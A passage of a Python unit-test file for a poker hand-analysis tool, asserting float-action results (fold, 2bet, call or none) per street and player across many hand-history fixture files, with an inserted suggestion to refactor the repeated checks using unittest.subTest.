msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual('fold', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual('fold', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XBC__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
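The assertions above repeat one open/construct/assert pattern for every file and (street, player) pair. A table-driven loop with `unittest.subTest` can express the same checks far more compactly; the sketch below is a minimal, self-contained illustration (the `enum_float_def_stub` function is a hypothetical stand-in for `Float.enum_float_def`, which needs the real `Reka` hand data from the fixture files):

```python
import unittest

# Hypothetical stand-in for Float.enum_float_def(): returns an action for
# one known (street, player) pair and None otherwise, mirroring the fact
# that most of the cases above expect None.
def enum_float_def_stub(strt, plr):
    return 'call' if (strt, plr) == ('turn', 'sf') else None

class TableDrivenExample(unittest.TestCase):
    # Each entry: (street, player, expected enum_float_def() result).
    CASES = [
        ('flop', 'sf', None),
        ('flop', 'zw', None),
        ('turn', 'sf', 'call'),
        ('turn', 'zw', None),
    ]

    def test_cases(self):
        for strt, plr, expected in self.CASES:
            # subTest labels each failure with its parameters and keeps
            # running the remaining cases instead of aborting the method.
            with self.subTest(strt=strt, plr=plr):
                self.assertEqual(expected, enum_float_def_stub(strt, plr))
```

With the real classes, each `CASES` row would also carry the fixture file name, and the loop body would open the file and build `Reka`/`Float` exactly as the inline blocks above do; `subTest` then replaces the hand-built `msg=` strings with automatic per-case labels.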
def test_float_raise_def_opp(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'in0gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXBFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XBRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XBRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
